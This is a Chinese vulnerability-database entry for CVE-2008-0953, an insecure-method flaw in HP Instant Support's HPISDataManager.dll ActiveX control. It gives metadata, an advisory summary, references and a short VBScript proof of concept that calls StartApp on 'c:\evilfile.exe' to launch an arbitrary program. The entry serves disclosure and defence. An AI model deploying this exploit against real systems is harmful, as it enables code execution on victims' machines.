HP Instant Support HPISDataManager.dll ActiveX控件 StartApp 功能缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115337 漏洞类型 Design Error
发布时间 2008-06-03 更新时间 2008-08-25
CVE编号 CVE-2008-0953 CNNVD-ID CNNVD-200806-063
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/31876
https://www.securityfocus.com/bid/29533
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-063
|漏洞详情
HPInstantSupport是基于网络的故障诊断和排除工具套件,适用于桌面计算和打印产品。HPInstantSupport1.0.0.24之前的版本,所安装的HPISDataManager.dllActiveX控件StartApp功能存在漏洞,远程攻击者可以利用参数的.exe文件类型,执行任意程序。
|漏洞EXP
source: http://www.securityfocus.com/bid/29533/info


HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to an insecure-method vulnerability.

Successfully exploiting this issue allows remote attackers to launch arbitrary applications with the privileges of the application running the ActiveX control (typically Internet Explorer).

Note that if the attacker could place a malicious executable on the system, they would be able to launch it using this vulnerability.

HP Instant Support 1.0.0.22 and earlier versions are affected.

NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. 

<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Function StartApp ( ByVal appName As String ) As String" memberName = "StartApp" progid = "HPISDataManagerLib.Datamgr" argCount = 1 arg1="c:\evilfile.exe" target.StartApp arg1 </script></job></package>
|受影响的产品
HP Instant Support 1.0 .22
|参考资料

来源:SECUNIA
名称:30516
链接:http://secunia.com/advisories/30516
来源:XF
名称:hp-instantsupport-startapp-code-execution(42851)
链接:http://xforce.iss.net/xforce/xfdb/42851
来源:HP
名称:SSRT071490
链接:http://www12.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01422264
来源:SECTRACK
名称:1020165
链接:http://www.securitytracker.com/id?1020165
来源:BID
名称:29533
链接:http://www.securityfocus.com/bid/29533
来源:BID
名称:29526
链接:http://www.securityfocus.com/bid/29526
来源:VUPEN
名称:ADV-2008-1740
链接:http://www.frsirt.com/english/advisories/2008/1740/references
来源:MISC
链接:http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf